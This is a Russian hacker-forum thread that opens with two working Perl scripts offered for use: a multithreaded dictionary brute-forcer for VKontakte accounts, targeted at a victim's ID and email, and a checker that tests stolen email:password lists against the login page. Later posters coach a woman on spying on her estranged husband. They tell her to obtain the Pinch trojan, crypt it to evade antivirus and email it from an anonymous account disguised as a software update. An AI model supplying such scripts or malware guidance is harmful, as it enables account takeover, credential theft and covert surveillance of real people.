вКонтакте.ru bruteforce with multi-threads

[Schtirliz]

вКонтакте.ru bruteforce with multi-threads ​

​

[*]Многопоточный
[*]Подбор по словарю
[*]Для брута можно указать ID или мыло.

Установка:
1. Качаем прогу ActivePerl 5.10.0.1001 или более раннюю версию.
2. потом копируем текст в текстовый файл из кода выше... меняем id и мыло жертвы на нужное ,сохраняем как brut.txt
3. переименовываем файл из brute.txt в brute.pl
4. туда где лежит этот файл, копируем файл со словарём, обзывая его passl.txt
5. запускаем файл, и радуемся...
6. создастся good.txt, где и будет ваш пасс.

[New$paN]

#!/usr/bin/perl 

use IO::Socket; 
use MD5; 
use threads; 
use threads::shared; 
my @pass : shared; 

###################################### 
# C!klodoL 
# vkontakte.ru bruteforce with multi-threads 
###################################### 
$dic = 'passl.txt'; #словарь паролей 
$id = 111111; #id цели 
$mail = 'mail%40mail.com'; #мыло, вместо @ вписать %40 
$threads = 4; #количество потоков 
###################################### 

open (pass, "<$dic"); 

Next: 
@pass = pass(); 

for(0..$threads) {$trl[$_] = threads->create(&Brut, $_);} 
for(@trl) { $_->join; } 

sub Brut 
{ 

while (@pass){ 

$pass = shift @pass; 

$md5 = MD5->hexhash($pass); 
$sock = IO::Socket::INET->new(Proto=>'tcp',PeerAddr=>'vkontakte.ru',PeerPor t=>80); 
print $sock "HEAD http://vkontakte.ru/ HTTP/1.0\r\n". 
"Host: vkontakte.ru\r\n". 
"Accept: */*\r\n". 
"Content-Type: application/x-www-form-urlencoded\r\n". 
"User-Agent: Mozillo\r\n". 
"Cookie: remixchk=2; remixmid=$id; remixemail=$mail; remixpass=$md5\r\n". 
"Connection: close\r\n\r\n"; 
$answ = <$sock>; 
close $sock; 
print "$pass $answ"; 
if ($answ =~ /302/){ 
open (good, '>>good.txt'); 
print good "$id:$pass:$md5\n"; 
print "$id:$pass:$md5\n"; 
close good; 
exit;} 
} 

} 

goto Next; 

sub pass 
{ 
my (@mas); 
while (<pass>){ 
push @mas, $_; 
last if (@mas == 400); 
} 
chomp @mas; 
return @mas; 
}

 

[Noctambulaar]

Это же боян? тут вывесил Хоть описание какое-то вывесил humbsup:

 

[login999]

[*]Для брута можно указать ID или мыло

Это вообще ни в какие рамки не лезет... нужно указать И ID и мыло...

 

[Z1P]

По моему,если знаешь мыло проще хакнуть мыло и на него уже выслать пароль от контакта))

 

[[sql]]

Не проще для себя мутил, со скула выводил:
мыло:пас
помещал в txt и проверялось)

#! /usr/bin/perl -w
use IO::Socket;

$ml       =  shift || 'all.txt';
$fname    = 'good.txt';

$|=1;

print "Loading...\n";
open (ACS, "<", $ml) || die("Could not open mail list file!");

map{
    my $sock = new IO::Socket::INET(
	PeerAddr => 'vkontakte.ru',
    PeerPort => 80, 
    PeerProto => 'tcp', 
    TimeOut => 3
    ) or die "Can't connect\n";
    my $data = "email=$_->{email}&pass=$_->{pass}";
    my $len = length($data);
    my $re = "POST /login.php HTTP/1.1\nHost: vkontakte.ru\n".
  "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b1; Windows NT 5.1; SV1; .NET CLR 1.1.4322; MS IdentiServ 1.4.12)\nKeep-Alive: 300\n".
  "Connection: keep-alive\nReferer: http://vkontakte.ru\n".
  "Content-Type: application/x-www-form-urlencoded\n".
  "Content-Length: $len\n\n$data";
    print $sock $re; 
    sysread ($sock, my $answ, 800);
    if($answ =~ /\S{32}/){
	print "[+] $_->{email}\n";
	open(FILE, ">>$fname") || die("Could not open $fname\n");
	print FILE "$_->{email} : $_->{pass}\n";
	close(FILE);
    }
    sleep(30);
}map{chomp&&/^(.+):(.+)$/&&{email=>$1, pass=>$2}}<ACS>;

 

[Анна]

я что то никак не могу понять! кто может помочь?

 

[Анна]

туда где лежит этот файл, копируем файл со словарём, обзывая его passl.txt

а я вот, наверное совсем блондинка и не понимаю откуда мне словарь взять?

 

[@$_terr_X]

http://www.insidepro.com/eng/download.shtml тут можно словари взять.
только от них толку будет 0. Вконтакте наконец таки ввел каптчу, бруты неактуальны.

 

[Анна]

и теперь никак не узнать пароль?
а есть какой нибудь еще способ, хотя бы не пароль узнать, а просто просмотреть переписку? очень нужно.....

 

[@$_terr_X]

можно жертве впарить троя, зайти на почту глянуть пароль... и почитать

 

[Анна]

спасибо! вот только я даже представления не имею как это сделать?

 

[Eisenheim]

Да элементарно! Скачать pinch где-нибудь вот здесь
http://xss.pro/index.php?topic=419
Закриптовать (паблик крипторов, которые не палятся 2-3 дня много везде раскидано) и отправить по почте как абсолютно обычный файл, допустим обновление icq\qip\skype\vk.agent\mail agent..
Либо попросить запустить, если человек знакомый (допустим как скринсейвер в формате.scr)

 

[Анна]

Спасибо! ОЙ, у Вас такой сложный язык, вообще, как Вы все это понимаете?
а я то вот просто мужа проверить хотела! он у меня в контакте зарегистрировался, а мне втирает, что его там нет, а мы его спалили... вот теперь мучает любопытство, что ж он там делает???
И на почте все пароли сменил.
а вот отправить с своей почты или мне нужно новый ящик создать? а его антивирус не пропалит?
Добавлено в [time]1226324821[/time]
ой, ой... а что именно там скачать нужно, а то там что то много чего есть- или все качать?

 

[Eisenheim]

Да скачивайте вот это:

Version build: 2.96
Way to send: mail
Author: Vaska

По-моему настраивается легче всего.
С новой, зарегистрированной не на своё имя почты, если нормально закриптуете не спалит.

Конечно совершенно не по теме топика\раздела\и вообще форума, но задумайтесь зачем вам это всё нужно?! Всё же более чем близкий человек.
Я бы не стал злоупотреблять доверием, в конце концов поговорить можно как-нибудь спокойно в реале, без какого-то компьютерного вмешательства.

А аккаунт могли зарегить друзья\коллеги\знакомые или ещё кто-нибудь, ну или вообще однофамилец.
Извините за оффтоп..

 

[Анна]

ТАК вот именно по этому и хочеться узнать... он там, похоже познакомился с какой то мадамой и ушел, мы уже 6 мес не живем вместе, он постоянно где то тусит!
а у нас с ним маленький сын, вот мне и интересно на кого он семью променял! незнаю даже может и действительно все это глупо, ну так для себя интересно!
Добавлено в [time]1226326577[/time]
ой, а что именно там настроить нужно?
Добавлено в [time]1226326776[/time]
а мне на компьюторе табличка пишет, что исходный фаил не может быть сохранен, т.к. не может быть прочтен.

 

[Eisenheim]

Регистрируйте два мыла: На которое придёт отчёт и с которого придёт отчёт.
И соответственно вписываете логин и пароль (только свои) как на скриншоте.
Во второй части пишите мыло на которое к вам должно прийти письмо. Затем криптуете и проверяете на себе - если работает и отчёт приходит можно действовать дальше, послав троян НЕ от своего имени..

Всё отлично скачивается. По ссылке перейдите. Только антивирь отключите, он на файл ругаться будет. И ещё не волнуйтесь если при проверке антивирусом файл будет детектиться как троян. Это нормально.

И вот что-то мне подсказывает, что ничего у вас не выйдет. Извините.

 

[Анна]

спасибо! но попробовать все же стоит!
да и зачем извиняться, я сама понимаю что глупо все это, но очень интересно все же....

 

[Zer0]

проше связать и пояльником )))

 

[Анна]

а есть такой специальный пояльник?

[mod][DeusTirael:] Погуглите на тему: "терморектальный криптоанализ"
Основная теорема терморектального криптоанализа:
время, необходимое для дешифрования сообщения не зависит от алгоритма шифрования и длины ключа.
http://termorect.narod.ru/[/mod]

 

[splo1ter]

конечно, а как же без него